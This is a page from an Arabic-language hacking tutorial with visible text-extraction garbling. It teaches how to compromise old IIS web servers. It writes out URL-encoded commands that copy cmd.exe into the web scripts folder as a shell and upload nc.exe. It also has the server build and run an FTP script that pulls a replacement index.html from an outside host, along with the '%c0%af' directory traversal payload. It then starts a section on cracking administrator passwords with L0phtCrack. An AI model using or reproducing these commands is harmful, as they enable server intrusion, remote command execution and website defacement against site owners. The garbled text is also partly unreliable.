Page 131 - بسم الله الرحمن الرحيم
P. 131
oالن يتم طلب الصفحة من ختلل المتصفح http://www.xxxx.com/test.shtml -3
oالن سوف تصظهر لك الصفحة .
-4
oالن تصستطيع الكتابه وتصم تصخطي مشكلة الـ . Access Denied -5
oاذا ظهرت لك صفحة الخطاء رقم 500فمعناها انك لم تصقم بتطبيق الطريقة بالشكل
الصحيح وعليك اعادة المحاولة .
الطريقة الثالثة باستخدا.م برنامج NC.exeبحيث يتم عمل اب لوود لهذا الملف داختل مجلد الـ Temp
في دليل الويندوز ومنه يتم تصنفيذ الوامر من ختلل موجهة الدوز وللمعلومية مجلد الـ Tempمفتو ح
لعمليات الب لوود .
الطريقة الرابعة وهي من ختلل عمل كراش للسيرفر باستخدا.م البرامج اللزمة لهذا الغرض وهذه
الطريقة غير مجديه في كثير من الحيان .
البحث عن ملفات root.exe ، sensepost.exe ، shell.exe ، w3svc.exe :ونسخها الى مجلد
c:\inetpub\scriptsوتصطبيق الثغرة من ختللها .
-كيفية عمل اكاونت للدختول بواسطة الـ . FTP
-1نبسخ ملف CMDالى مجلد Scriptsباسم Shell.exeحتى يتم الاستفاد ة من ثغر ة قديمة
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe/
-2انبشاء ملف mspft.pllبواسطة الامر Echoوكتابة فيه التالي open ftp.host.comحيث
c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl/ ان هذا هو الخاد م للـ . FTP
-3الن مطلوب اضافة مجهول Anonymousالى نفس الملف الذي قمنا بانشاءه mspft.pll
shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl/
-4الان مطلوب ادراج البريد hExRay@Hotmail.Comالى نفس الملف الذي قمنا بانشاءه
shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/ mspft.pll
-5إضافة Userقبل Anonymousلزو.م الملف الذي قمنا بانشاءه mspft.pll
shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl/
shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/ -6الن تصكرار لحاجهة العداد
يتم هنا ادراج الموقع الحالي للملفات .g
shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl/
-8الن يكتب اوامر الـ FTPاللزمة لسحب الملف من ختاد.م الـ FTPوهي Get index.htmثم يدرج هنا
shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl/ بدون المسج السابق
shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl/ -9هنا نفس السابق ولكن باضافة Quit
-10الن يتم تصنفيذ امر ”FTP.exe?+"-s:c:winnt\mspft.pplوهو عبارة عن ختطوات قمنا بانشاءها
Open FTP.host.com - وموجهودة في ملف mspft.pplباحتوائها على مايلي -:
Anonymous -
hEx@Hotmail.Com -
User Anonymous -
hEx@Hotmail.Com -
Get index.html -
Quit -
"msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl/
-طريقة كشف باسورد الدمينستريتور .
نحتاج الى وجهود برنامجين ) ( Microsoft Access – L0phtCrackوهي لزو.م تصنفيذ بعض
الخطوات لتالية وهي -:
131